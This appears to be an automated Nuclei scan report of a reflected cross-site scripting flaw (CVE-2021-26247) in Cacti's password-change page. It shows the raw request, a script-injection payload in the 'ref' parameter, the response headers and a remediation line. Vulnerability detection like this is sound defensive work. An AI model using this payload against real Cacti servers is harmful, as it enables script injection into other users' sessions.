Cacti contains a cross-site scripting vulnerability via "http:///auth_changepassword.php?ref=" which can successfully execute the JavaScript payload present in the "ref" URL parameter.
Remediation
Apply the latest security patches or upgrade to a patched version of Cacti to mitigate this vulnerability.
GET /auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 291
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:06 GMT
GET /auth_changepassword.php?ref="></script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
Details: CVE-2021-26247 matched at honey.scanme.sh
Protocol: HTTP
Full URL: https://honey.scanme.sh/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
Timestamp: Tue Apr 30 13:42:06 +0000 UTC 2024
Source: https://cloud.projectdiscovery.io/vuln/1909f3f68635b42625e1b200d2263afb
Template Information
Request
Response
References:
CURL command
Generated by Nuclei v3.2.5